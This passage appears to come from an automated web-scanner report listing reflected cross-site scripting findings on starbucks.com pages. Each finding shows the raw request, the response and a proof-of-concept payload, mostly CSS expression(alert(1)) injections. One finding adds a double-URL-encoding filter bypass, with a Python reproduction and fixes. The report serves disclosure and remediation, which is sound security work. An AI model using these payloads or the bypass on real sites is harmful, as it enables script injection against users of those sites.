Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58e00"style="x:expression(alert(1))"c89dda96f09 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /customer-service/faqs/card?58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:06 GMT
Connection: close
Content-Length: 87900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?58e00"style="x:expression(alert(1))"c89dda96f09=1"/>
...[SNIP]...

2.77. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64c52"style="x:expression(alert(1))"411f5c964e5 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /customer-service/faqs/coffee?64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:48 GMT
Connection: close
Content-Length: 37606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?64c52"style="x:expression(alert(1))"411f5c964e5=1"/>
...[SNIP]...

2.78. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835ba"style%3d"x%3aexpression(alert(1))"de67136c231 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 835ba"style="x:expression(alert(1))"de67136c231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /customer-service/faqs/coffeehouse?835ba"style%3d"x%3aexpression(alert(1))"de67136c231=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:16 GMT
Connection: close
Content-Length: 59203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?835ba"style="x:expression(alert(1))"de67136c231=1"/>
...[SNIP]...

2.79. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b07"style%3d"x%3aexpression(alert(1))"d430c70698c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67b07"style="x:expression(alert(1))"d430c70698c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /customer-service/faqs/menu?67b07"style%3d"x%3aexpression(alert(1))"d430c70698c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:46 GMT
Connection: close
Content-Length: 37148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?67b07"style="x:expression(alert(1))"d430c70698c=1"/>
...[SNIP]...

2.80. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82a22"style="x:expression(alert(1))"ae90a773c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /customer-service/faqs/responsibility?82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:05 GMT
Connection: close
Content-Length: 37371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?82a22"style="x:expression(alert(1))"ae90a773c06=1"/>
...[SNIP]...

2.81. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52686"style%3d"x%3aexpression(alert(1))"0dd78febff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52686"style="x:expression(alert(1))"0dd78febff8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /customer-service/faqs/shop?52686"style%3d"x%3aexpression(alert(1))"0dd78febff8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:47 GMT
Connection: close
Content-Length: 51738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?52686"style="x:expression(alert(1))"0dd78febff8=1"/>
...[SNIP]...

2.82. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f06e7"style="x:expression(alert(1))"79ab42fc008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu?f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/search?keywords=%27
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.2.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:04:51 GMT
Content-Length: 73370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?f06e7"style="x:expression(alert(1))"79ab42fc008=1"/>
...[SNIP]...

2.83. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfba3"style="x:expression(alert(1))"49bff4af7b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /menu/?dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:07 GMT
Connection: close
Content-Length: 73370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?dfba3"style="x:expression(alert(1))"49bff4af7b5=1"/>
...[SNIP]...

2.84. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd71c"style="x:expression(alert(1))"a1cc417fc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu/catalog/nutrition?drink=bottled-drinks&cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:57 GMT
Connection: close
Content-Length: 45151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/catalog/nutrition?drink=bottled-drinks&cd71c"style="x:expression(alert(1))"a1cc417fc6c=1"/>
...[SNIP]...

2.85. http://www.starbucks.com/menu/catalog/nutrition [wellness parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The value of the wellness request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e was submitted in the wellness parameter. This input was echoed as b4984"><script>alert(1)</script>7b93903311e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The web server decodes %253c once, to %3c, which passes the filter; the application then decodes it a second time, to <, before writing it into the page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the wellness request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be encoded for the context it is written into (URL-encoded as a query-string value and then HTML-encoded as part of the href attribute), so that a filter bypass alone does not yield script execution.
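The filter-then-decode ordering this finding infers, as an added example that is not the site's code: the server-side logic is reconstructed from the request and response shown (a character blacklist that sees the once-decoded value, a second URL-decode, and raw reflection into the href), and the function names are illustrative. It reproduces the bypass with the 2.85 probe, shows the same probe single-encoded being rejected by the filter, and contrasts two fixes: dropping the second decode and encoding for the output context, or, where a second decode must stay, canonicalising before validating.

```python
import html
from urllib.parse import quote, unquote

# Inferred filter: the report says "certain characters" are blocked; these
# three are the ones the probe had to double-encode to get through.
BLOCKED_CHARS = set('<>"')

# The wellness value from finding 2.85 as sent on the wire (double URL-encoded),
# and the same payload single-encoded, which is what a naive attempt sends.
PROBE_DOUBLE = ("high-fiberb4984%2522%253e%253cscript%253ealert%25281%2529"
                "%253c%252fscript%253e7b93903311e")
PROBE_SINGLE = unquote(PROBE_DOUBLE)   # one decode turns %25xx into %xx

# The pagination link the response reflected the value into (from 2.85).
LINK = ('<a href="http://www.starbucks.com:80/menu/catalog/nutrition'
        '?food=all&wellness=%s&page=2">')


def server_decode(wire_value):
    """The single URL-decode the web server performs before the app sees it."""
    return unquote(wire_value)


def blacklist_ok(value):
    """Inferred filter: reject if any blocked character is present."""
    return not (BLOCKED_CHARS & set(value))


def render_link_vulnerable(wire_value):
    """Validate first, decode again afterwards, reflect raw.
    Returns None when the filter rejects the request."""
    once = server_decode(wire_value)
    if not blacklist_ok(once):
        return None
    twice = unquote(once)          # the second, unnecessary decode
    return LINK % twice


def canonicalise(value, max_rounds=5):
    """Decode until the value stops changing (bounded), so validation sees the
    same characters the sink will. Only needed if a second decode must stay."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("value did not stabilise after %d decodes" % max_rounds)


def render_link_fixed(wire_value):
    """Fix 1: no second decode, and the value is URL-encoded for the query
    string and then HTML-attribute-encoded for the href, so the blacklist is
    no longer the only line of defence."""
    once = server_decode(wire_value)
    if not blacklist_ok(once):
        return None
    return LINK % html.escape(quote(once, safe=""), quote=True)


def render_link_validated_after_canonicalisation(wire_value):
    """Fix 2: if the extra decode has to stay, canonicalise first, validate
    the canonical form, then encode for the output context."""
    canonical = canonicalise(server_decode(wire_value))
    if not blacklist_ok(canonical):
        return None
    return LINK % html.escape(quote(canonical, safe=""), quote=True)


if __name__ == "__main__":
    print("single-encoded, vulnerable:", render_link_vulnerable(PROBE_SINGLE))
    print("double-encoded, vulnerable:", render_link_vulnerable(PROBE_DOUBLE))
    print("double-encoded, fixed:     ", render_link_fixed(PROBE_DOUBLE))
    print("double-encoded, canonical: ",
          render_link_validated_after_canonicalisation(PROBE_DOUBLE))
```

Run as a script it prints the four outcomes; the vulnerable double-encoded case reproduces the `"><script>alert(1)</script>` fragment seen in the response, while both fixed renderings either reject the value or emit it with no unencoded markup.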

Request

GET /menu/catalog/nutrition?food=all&wellness=high-fiberb4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:31 GMT
Connection: close
Content-Length: 54080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="http://www.starbucks.com:80/menu/catalog/nutrition?food=all&wellness=high-fiberb4984"><script>alert(1)</script>7b93903311e&page=2">
...[SNIP]...

2.86. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decb7"style%3d"x%3aexpression(alert(1))"f7af35945af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as decb7"style="x:expression(alert(1))"f7af35945af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu/drinks?decb7"style%3d"x%3aexpression(alert(1))"f7af35945af=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:39 GMT
Connection: close
Content-Length: 62628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?decb7"style="x:expression(alert(1))"f7af35945af=1"/>
...[SNIP]...

2.87. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f952b"style%3d"x%3aexpression(alert(1))"627ac60126a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f952b"style="x:expression(alert(1))"627ac60126a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style%3d"x%3aexpression(alert(1))"627ac60126a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:36 GMT
Connection: close
Content-Length: 39912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style="x:expression(alert(1))"627ac60126a=1"/>
...[SNIP]...

2.88. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-mocha

Issue detail

